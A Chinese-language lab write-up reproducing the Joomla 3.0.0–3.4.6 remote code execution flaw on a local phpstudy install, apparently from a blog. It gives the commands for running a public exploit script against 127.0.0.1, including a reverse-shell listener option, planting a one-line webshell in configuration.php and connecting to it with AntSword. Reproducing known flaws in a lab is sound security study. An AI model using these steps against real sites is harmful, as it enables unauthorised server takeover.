Joomla-3.4.6远程代码执行漏洞复现

#01 Joomla简介
Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩充使用范围。目前最新版本3.9.11,Joomla!是一套自由的开源软件,使用GPL授权,任何人随时都能下载 Joomla! 并使用。

#02 漏洞简介

在exploit-db( https://www.exploit-db.com/exploits/47465)发布了Joomla命令执行的EXP,漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,实现远程命令执行,获取服务器权限。影响范围:3.0.0 <= Joomla <= 3.4.6

#03 Joomla环境搭建

1.用phpstudy集成环境搭建即可

●下载joomla3.4.6

Joomla下载地址:https://downloads.joomla.org/it/cms/joomla3/3-4-6

●下载完成之后拖到WWW根目录下,访问:http://127.0.0.1/joomla1(你安装的目录),就会自动跳转到如下安装界面,根据提示进行安装即可!

填入相关信息,点击下一步​
Joomla-3.4.6远程代码执行漏洞复现_第1张图片
用户名和密码,用phpstudy的话,默认用户名密码都是root,随便起一个数据库名,next
Joomla-3.4.6远程代码执行漏洞复现_第2张图片
这里直接下一步
Joomla-3.4.6远程代码执行漏洞复现_第3张图片
安装完之后,到这里点击删除安装目录
Joomla-3.4.6远程代码执行漏洞复现_第4张图片
删除完安装目录,点击网站,或者访问:http://127.0.0.1/joomla1(你的安装目录),就可以访问
Joomla-3.4.6远程代码执行漏洞复现_第5张图片
Joomla-3.4.6远程代码执行漏洞复现_第6张图片
访问成功,到此Joomla3.4.6就搭建完成了

2.下载所需EXP:

●推荐下载地址,当然也可以自行下载:

https://github.com/ianxtianxt/Joomla-3.4.6—configuration.php-Remote-Code-Execution

●用python3 执行下载的py脚本,ps:我这里重命名了脚本名字。输入:python3 Joomla-3.4.6-RCE.py -h,查看命令参数,但是发现缺少相关pip,报错了…试了一些办法没解决,所以默默的把截图发给了马丁老师,老师告诉我是缺少了所需要的依赖库,OK恍然大悟!开始安装库,继续操作
Joomla-3.4.6远程代码执行漏洞复现_第7张图片
●安装相关依赖库:
pip install requests
Joomla-3.4.6远程代码执行漏洞复现_第8张图片
pip install bs64
Joomla-3.4.6远程代码执行漏洞复现_第9张图片
pip install termcolor
Joomla-3.4.6远程代码执行漏洞复现_第10张图片
所需要的pip安装完成,再次执行python3 Joomla-3.4.6-RCE.py -h,查看相关参数
Joomla-3.4.6远程代码执行漏洞复现_第11张图片
#04 漏洞复现

1.验证漏洞:

python3 Joomla-3.4.6-RCE.py -t http://127.0.0.1/joomla1/ -c
Joomla-3.4.6远程代码执行漏洞复现_第12张图片
注意在127.0.0.1/joomla1 后面一定要加上斜杠,因为脚本里有拼接,否则会利用失败,看到图中圈住的地方,就证明存在该漏洞,接下来开始利用。

2.漏洞利用

python3 Joomla-3.4.6-RCE.py -t http://127.0.0.1/joomla1/ -e -l 127.0.0.1 -p 4444
Joomla-3.4.6远程代码执行漏洞复现_第13张图片
-l +你的ip,-p +端口(可随机,不冲突即可)

这里并没有反弹shell,但是可以看到生成的马的密码,如图。

我们去看一下configuration.php文件是否真的生产了一句话木马。

3.打开configuration.php文件
在这里插入图片描述
成功生成了一句话木马,密码和刚才上一张图中的密码一致
在这里插入图片描述
4.用蚁剑连接一句话:

地址:http://127.0.0.1/joomla1/configuration.php
Joomla-3.4.6远程代码执行漏洞复现_第14张图片
Joomla-3.4.6远程代码执行漏洞复现_第15张图片
成功连接,拿到webshell

#05 总结

你可能感兴趣的:(web渗透网络安全,Web渗透测试,Web渗透)